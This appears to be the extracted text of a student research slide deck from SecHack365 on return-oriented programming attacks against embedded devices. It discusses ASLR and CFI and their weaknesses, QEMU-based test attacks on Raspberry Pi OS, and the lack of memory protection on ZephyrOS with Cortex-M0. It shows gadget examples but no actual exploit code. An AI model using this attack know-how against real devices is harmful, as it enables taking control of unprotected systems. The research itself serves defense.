where program code and data are stored,
which makes access to specific code and data difficult.
KASLR is ASLR deployed to the kernel
16
17. ASLR
Assembly Code
buf (0x10)
rbp
rsp
saved rbp
Return Address
rbp + 8
・
・
・
Stack Region Register
rdi: Store parameter 1
rsi: Store parameter 2
rdx: Store parameter 3
rip: Store next address for
execution
rbp: Store lowest address
inside the stack frame
rsp: Store stack top
address
17
0x400100:
0x400102:
:
0x400200:
0x400202:
:
0x400300:
0x400302:
:
pop rdi
ret
pop rsi
ret
pop rdx
ret
??????
??????
??????
??????
??????
??????
Address of the instruction has been randomized, so building ROP chains is not possible.
18. Effective Security Countermeasures
against ROP②
18
Control-Flow Integrity (CFI):
Security measure that creates a model of normal control flow then compares
that model to the flow at execution time to detect anomalous control flow.
20. ASLR Weaknesses
・In less than 32 bit address space, address leaks can be triggered
by brute force attacks.
→Not realistic to implement in low spec embedded devices
with narrow address space.
20
21. CFI Weakness
・Resource intensive for the processor, therefore, requires high capability CPU
→Difficult to implement into low spec embedded devices.
21
22. Details regarding the ROP evaluation in
this research
・Using simple ROP attacks.
→Find embedded devices that can be overtaken with simple ROP
・Use QEMU to emulate embedded devices.
→QEMU enables us to check the register and memory content
in the guest environment.
22
28. Examination Results
・Because many security measures such as SSP and ASLR are active by default,
unless those are made inactive a simple
ROP attack will not result in gaining control.
28
29. ROP against Raspi OS on Arm Cortex-a53
・Emulate Raspi OS on Arm Cortex-a53 using QEMU and launch ROP attack
against vulnerable test server.
29
30. Attack Target Environment
OS: Raspberry Pi OS
Arch: Armv8-A
Server program source code: http://kozos.jp/samples/rop-sample.html
Processor execution state: AArch32
Security Measures:
・NX bit: Active
・SSP: Inactive
・ASLR: Inactive
・CFI: Inactive
30
32. Exploit code (ROP chain part)
R0 register: store parameter 1
pc register: Program counter register
r4 register: Not used here
32
33. Examination Results
・Raspberry Pi 3B+ is a high spec embedded device and many security
measures are available, therefore without disabling these security measures
ROP attack was unsuccessful.
33
34. Verification summary so far
Security※
Target NX bit ASLR SSP CFI
CentOS6 on i686 〇 〇 〇 ×
RaspiOS on Arm Cortex-A53 〇 〇 〇 ×
ZephyrOS on Arm Cortex-M0 ? ? ? ?
※Enabled by default
35. ROP attack to low spec embedded device
Investigate possibilities of ROP attacks against ZephyrOS on Arm Cortex-M0.
→Survey results, ZephyrOS on Arm Cortex-M0
may not have countermeasures against ROP.
36. ZephyrOS
・An Embedded OS that can run on boards with strict restrictions.
・ZephyrOS can be utilized to various boards.
e.g.
Arduino-mega2560, microbit, STM32F0 series…
37. Memory protection in ZephyrOS
The following Memory protection are implemented.
・Stack protection
・Memory isolation
・Thread isolation
Requires MPU
38. Memory Protection Unit(MPU)
・In, low-spec processors that cannot implement MMU,
Critical hardware for Memory protection
・Divide the address space into several areas,
set access rights for each area.
39. Arm Cortex-M0
・As a low-power processor, it is used in STM32F0 series board and microbit.
・Memory Protection Unit(MPU) is not implemented,
security using MPU used in many OS cannot be applied.
40. ROP countermeasure in low spec
embedded devices.
・Currently the following countermeasures can be considered for implementation.
40
41. Conclusion
・When CFI and ASLR are not applied in the program gaining control is possible
with a simple ROP attack.
・Consider implementing ROP countermeasures in low spec embedded devices,
implement security measures if necessary.
41
42. Acknowledgements
・Special thanks to the National Institute of Information and Communications
Technology organized SecHack365 and its trainer Hiroaki Sakai ,
who showed the basics of program execution and debug methods,
which this research is founded upon.
Thank you Mr.Sakai and all SecHack365 staff.
42